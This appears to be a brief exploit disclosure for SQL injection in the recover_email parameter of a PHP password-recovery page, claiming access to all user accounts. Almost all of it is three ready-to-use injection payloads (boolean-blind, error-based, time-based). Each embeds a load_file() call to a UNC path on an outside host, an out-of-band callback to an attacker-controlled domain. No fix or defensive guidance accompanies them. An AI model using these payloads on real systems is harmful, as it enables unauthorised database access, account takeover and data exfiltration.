The recover_email parameter on user_password_recover.php app is vulnerable to three types of SQL injection attacks. The attacker can take access to all accounts on this system.
Status: CRITICAL
[+] Payloads:
---
Parameter: recover_email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' OR NOT 9177=9177 AND 'HeFM'='HeFM&u_pass_recover=Recover Password
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net'+(select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg'))+'' AND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND 'qfSm'='qfSm&u_pass_recover=Recover Password
---
